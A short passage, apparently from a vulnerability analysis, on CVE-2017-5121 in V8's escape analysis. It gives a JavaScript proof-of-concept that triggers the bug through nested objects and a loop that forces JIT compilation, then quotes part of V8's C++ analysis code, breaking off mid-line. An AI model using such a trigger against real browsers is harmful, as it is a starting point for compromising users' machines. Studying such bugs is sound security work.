CVE-2017-5121 Escape Analysis
CVE-2017-5121 Escape Analysis PoC var func0 = function(f) { var o = { a: {}, b: { ba: {baa: 0, bab :[]}, bb: {}, bc: {bca: {bcaa: 0, bcab: 0, bcac: this}}, } }; o.b.bc.bca.bcab = 0; o.b.bb.bba = Object.toString(o.b.ba.bab); }; function g(){ while(true) func0(); } g(); Escape Analysis in V8 Analyze Source of Fields of Allocates: Traverse the IR graph(along Effect edge) to get the source of fields of Allocate void EscapeAnalysis::RunObjectAnalysis() { virtual_states_.resize(graph()->NodeCount()); ZoneDeque<Node*> queue(zone()); queue.push_back(graph()->start()); ZoneVector<Node*> danglers(zone()); while (!queue.empty()) { Node* node = queue.back(); queue.pop_back(); status_analysis_->SetInQueue(node->id(), false); if (Process(node)) { for (Edge edge : node->use_edges()) { Node* use = edge.from(); if (status_